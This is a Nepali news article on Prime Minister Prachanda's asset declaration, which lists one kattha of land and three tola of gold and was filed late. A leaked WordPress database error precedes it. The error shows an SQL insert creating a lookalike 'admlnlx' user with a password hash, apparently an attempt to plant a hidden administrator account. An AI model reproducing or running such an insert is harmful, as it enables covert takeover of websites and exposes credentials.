WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BoNbWikOwq1pc5eJE3JC49PFQ.FBk30', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 18:48:07', '', 'admlnlx', 'admlnlx')
काठमाडौं,मंसिर २९-
प्रधानमन्त्री पुष्पकमल दाहाल प्रचन्डसंग कति सम्पति होला ? जो कोहिको पनि अनुमान हुन्छ “धेरै नै होला” । तर सरकारले सार्बजनिक गरेको प्रधानमन्त्रीको सम्पति विवरण हेरेव्र तपाई छक्क पर्नु हुन्छ । प्रचण्डले आफ्नी सम्पति बिवरणमा आफु संग एक कट्ठा जमीन र तीन तोला सुन बाहेक अरु केहि सम्पति नभएको बताएका छन् । यस हिसाबले उनी सुशील कोइराला पछिकै नेपालका गरिब प्रधानमन्त्री बनेका छन् ।
पुर्व प्रधानमन्त्री सुशील कोइरालाले आफुसंग ३ थान मोबाइल सेट मात्र भएको सम्पति बिवरण पेश गरेका थिए । प्रचण्डले पेश गरेको सम्पति विवरणमा श्रीमती सिता दाहालको नाममा चितवनमा एक कट्ठा जमीन र तीन तोला सुन मात्र भएको उल्लेख गरेका छन् । यी दुवै पैतृक सम्पति रहेको समेत उनले उल्लेख गरेका छन् । सार्बजनिक पद धारण गरेको ६० दिन भित्र सम्पति विवरण बुझाउनु पर्ने भए पनि उनले ४ महिना पछि मात्र सम्पति विवरण सार्बजनिक गरेका हुन् ।